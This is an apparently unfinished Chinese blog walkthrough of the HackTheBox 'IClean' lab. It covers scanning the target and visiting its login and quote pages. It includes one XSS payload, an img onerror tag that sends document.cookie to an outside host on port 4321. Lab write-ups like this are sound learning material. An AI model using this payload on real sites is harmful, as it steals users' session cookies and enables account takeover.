Stack Ashes
Go back

hackthebox-IClean-walkthrough

IClean 获取flag

机器环境

目标机器

IP : 10.10.11.12

alt text

由于我想要使用windows中的浏览器和burpusuite进行攻击, 但是同时想要使用kali中的工具进行攻击,如何实现呢? alt text

宿主机器

IP :

alt text

渗透思路

  1. 给的是IP地址,直接扫描端口 alt text 被扫坏了 重新启动

  2. 看到80端口,直接访问 alt text 登录API http://capiclean.htb/login http://capiclean.htb/quote

    alt text

XSS

web界面 alt text

```bash

<img src=x onerror=fetch(“http://192.168.31.241:4321/“+document.cookie);> ```

cao, 遮掉网络不稳啊

玩玩ctf吧, 好像白天稳啊

Share this post on:
Share this post via WhatsApp Share this post on Facebook Share this post on X Share this post via Telegram Share this post on Pinterest Share this post via email
Previous Post
V&N2020-公开赛CHECKIN
Next Post
java-unserialize